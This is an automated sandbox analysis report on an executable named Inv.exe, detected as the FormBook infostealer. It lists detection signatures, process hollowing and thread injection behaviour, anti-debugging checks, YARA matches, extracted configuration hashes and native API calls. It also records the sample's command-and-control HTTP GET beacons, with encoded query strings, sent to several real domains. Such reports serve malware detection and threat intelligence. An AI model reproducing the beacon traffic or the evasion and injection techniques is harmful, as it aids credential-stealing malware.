Analysis Report Inv.exe

Overview

General Information

Sample Name: Inv.exe
Analysis ID: 339347
MD5: a3aba7d40da6c8c86e4e8d035803f314
SHA1: 469b36f05939d6ec6457f1b72ba9f6c7a960be06
SHA256: 1f94eb81e3cde4f677fd210e1ff7f5d06987cbdc2fa7de79e28b224e49244b40
Tags: exeFormbook

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Uses netstat to query active network connections and open ports
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

barindex
Antivirus / Scanner detection for submitted sample
Source: Inv.exe Avira: detected
Found malware configuration
Source: 0.2.Inv.exe.d90000.1.unpack Malware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x8bc3", "KEY1_OFFSET 0x1d6f3", "CONFIG SIZE : 0xd9", "CONFIG OFFSET 0x1d7ed", "URL SIZE : 28", "searching string pattern", "strings_offset 0x1c373", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0xb201d05d", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f715030", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad012164", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd015d1", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04",
Multi AV Scanner detection for submitted file
Source: Inv.exe Virustotal: Detection: 39% Perma Link
Source: Inv.exe ReversingLabs: Detection: 45%
Yara detected FormBook
Source: Yara match File source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0.2.Inv.exe.d90000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Inv.exe.d90000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.Inv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.Inv.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: Inv.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 0.2.Inv.exe.d90000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.Inv.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

barindex
Uses 32bit PE files
Source: Inv.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: Inv.exe Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: netstat.pdbGCTL source: Inv.exe, 00000001.00000002.709669837.00000000018F0000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.685750168.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: netstat.pdb source: Inv.exe, 00000001.00000002.709669837.00000000018F0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: Inv.exe, 00000000.00000003.670292202.000000001A590000.00000004.00000001.sdmp, Inv.exe, 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, NETSTAT.EXE, 00000004.00000002.1047189715.0000000002DF0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: Inv.exe, NETSTAT.EXE
Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.685750168.0000000005A00000.00000002.00000001.sdmp

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\Inv.exe Code function: 4x nop then pop esi 1_2_004172FA
Source: C:\Users\user\Desktop\Inv.exe Code function: 4x nop then pop ebx 1_2_00407B05
Source: C:\Users\user\Desktop\Inv.exe Code function: 4x nop then pop edi 1_2_0040E44D
Source: C:\Users\user\Desktop\Inv.exe Code function: 4x nop then pop edi 1_2_00417D80
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4x nop then pop esi 4_2_003672FA
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4x nop then pop ebx 4_2_00357B05
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4x nop then pop edi 4_2_0035E44D
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4x nop then pop edi 4_2_00367D80

Networking:

barindex
Uses netstat to query active network connections and open ports
Source: unknown Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=9ExSQ4NEk+xqeDwz7kz53SpWI5tzJaWW64EQQFdVNavty5IFfZu+ty07sGNE8SwhRq/4 HTTP/1.1Host: www.millcityloam.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=Ds6mycG6XVC6cOnx6IQpHboGdSODTK5baT5OF1Gnzp/H9CBW+9tUucbuBNfXcxevyFer HTTP/1.1Host: www.achonabu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=eHiVknBCI+BDKnmhqMCE00F5l7UznldHUBBF08pOLsPmMyvxBhFlr4jwGXO1VYCPd09p HTTP/1.1Host: www.a-zsolutionsllc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /hko6/?k2JxoV=oEk1uwcTzyLRlLIEQvULAWzRIM6BrJQxm2nmuYWQkJ+zIoa1KldNyrAb+1j5GiVi4vc4&OHiLR=jJBpdVbhUrMh9TJP HTTP/1.1Host: www.nationshiphop.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 198.54.117.217 198.54.117.217
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: GOOGLEUS GOOGLEUS
Source: Joe Sandbox View ASN Name: SINGLEHOP-LLCUS SINGLEHOP-LLCUS
Source: global traffic HTTP traffic detected: GET /hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=9ExSQ4NEk+xqeDwz7kz53SpWI5tzJaWW64EQQFdVNavty5IFfZu+ty07sGNE8SwhRq/4 HTTP/1.1Host: www.millcityloam.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=Ds6mycG6XVC6cOnx6IQpHboGdSODTK5baT5OF1Gnzp/H9CBW+9tUucbuBNfXcxevyFer HTTP/1.1Host: www.achonabu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=eHiVknBCI+BDKnmhqMCE00F5l7UznldHUBBF08pOLsPmMyvxBhFlr4jwGXO1VYCPd09p HTTP/1.1Host: www.a-zsolutionsllc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /hko6/?k2JxoV=oEk1uwcTzyLRlLIEQvULAWzRIM6BrJQxm2nmuYWQkJ+zIoa1KldNyrAb+1j5GiVi4vc4&OHiLR=jJBpdVbhUrMh9TJP HTTP/1.1Host: www.nationshiphop.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: unknown DNS traffic detected: queries for: www.millcityloam.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeX-Powered-By: PHP/5.6.40Content-Type: text/html; charset=UTF-8X-UA-Compatible: IE=edgeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://abccarpetcare.com/wp-json/>; rel="https://api.w.org/"X-LiteSpeed-Cache-Control: public,max-age=3600X-LiteSpeed-Tag: 2cd_404,2cd_URL.8baa36f0385195f985698a5c3d8ac84b,2cd_ERR.404,2cd_X-Litespeed-Cache: missTransfer-Encoding: chunkedDate: Wed, 13 Jan 2021 20:27:17 GMTServer: LiteSpeedData Raw: 34 35 37 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 62 63 63 61 72 70 65 74 63 61 72 65 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 41 42 43 20 43 61 72 70 65 74 20 43 61 72 65 20 26 23 38 32 31 31 3b 20 41 42 43 20 52 75 67 20 43 6c 65 61 6e 69 6e 67 20 4e 59 43 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 54 6f 74 61 6c 20 57 6f 72 64 50 72 65 73 73 20 54 68 65 6d 65 20 33 2e 36 2e 30 22 20 2f 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 61 62 63 63 61 72 70 65 74 63 61 72 65 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 73 2e 77 2e 6f 72 67 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 42 43 20 43 61 72 70 65 74 20 43 61 72 65 20 2d 20 41 42 43 20 52 75 67 20 43 6c 65 61 6e 69 6e 67 20 4e 59 43 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 62 63 63 61 72 70 65 74 63 61 72 65 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 42 43 20 43 61 72 70 65 74 20 43 61 72 65 20 2d 20 41 42 43 20 52 Data Ascii: 457d<!DOCTYPE html><html lang="en-US" ><he
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000002.00000002.1048019987.0000000002B50000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Creates a DirectInput object (often for capturing keystrokes)
Source: Inv.exe, 00000000.00000002.673645409.0000000000A58000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0.2.Inv.exe.d90000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Inv.exe.d90000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.Inv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.Inv.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Inv.exe.d90000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Inv.exe.d90000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Inv.exe.d90000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Inv.exe.d90000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.Inv.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.Inv.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.Inv.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.Inv.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Contains functionality to call native functions
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0041A060 NtClose, 1_2_0041A060
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0041A110 NtAllocateVirtualMemory, 1_2_0041A110
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_00419F30 NtCreateFile, 1_2_00419F30
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_00419FE0 NtReadFile, 1_2_00419FE0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0041A08A NtAllocateVirtualMemory, 1_2_0041A08A
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_00419FDA NtReadFile, 1_2_00419FDA
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_00419FDC NtReadFile, 1_2_00419FDC
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019899A0 NtCreateSection,LdrInitializeThunk, 1_2_019899A0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989910 NtAdjustPrivilegesToken,LdrInitializeThunk, 1_2_01989910
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019898F0 NtReadVirtualMemory,LdrInitializeThunk, 1_2_019898F0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989840 NtDelayExecution,LdrInitializeThunk, 1_2_01989840
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989860 NtQuerySystemInformation,LdrInitializeThunk, 1_2_01989860
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989A00 NtProtectVirtualMemory,LdrInitializeThunk, 1_2_01989A00
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989A20 NtResumeThread,LdrInitializeThunk, 1_2_01989A20
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989A50 NtCreateFile,LdrInitializeThunk, 1_2_01989A50
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019895D0 NtClose,LdrInitializeThunk, 1_2_019895D0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989540 NtReadFile,LdrInitializeThunk, 1_2_01989540
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989780 NtMapViewOfSection,LdrInitializeThunk, 1_2_01989780
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019897A0 NtUnmapViewOfSection,LdrInitializeThunk, 1_2_019897A0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989710 NtQueryInformationToken,LdrInitializeThunk, 1_2_01989710
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019896E0 NtFreeVirtualMemory,LdrInitializeThunk, 1_2_019896E0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989660 NtAllocateVirtualMemory,LdrInitializeThunk, 1_2_01989660
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019899D0 NtCreateProcessEx, 1_2_019899D0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989950 NtQueueApcThread, 1_2_01989950
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019898A0 NtWriteVirtualMemory, 1_2_019898A0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989820 NtEnumerateKey, 1_2_01989820
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0198B040 NtSuspendThread, 1_2_0198B040
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0198A3B0 NtGetContextThread, 1_2_0198A3B0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989B00 NtSetValueKey, 1_2_01989B00
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989A80 NtOpenDirectoryObject, 1_2_01989A80
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989A10 NtQuerySection, 1_2_01989A10
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019895F0 NtQueryInformationFile, 1_2_019895F0
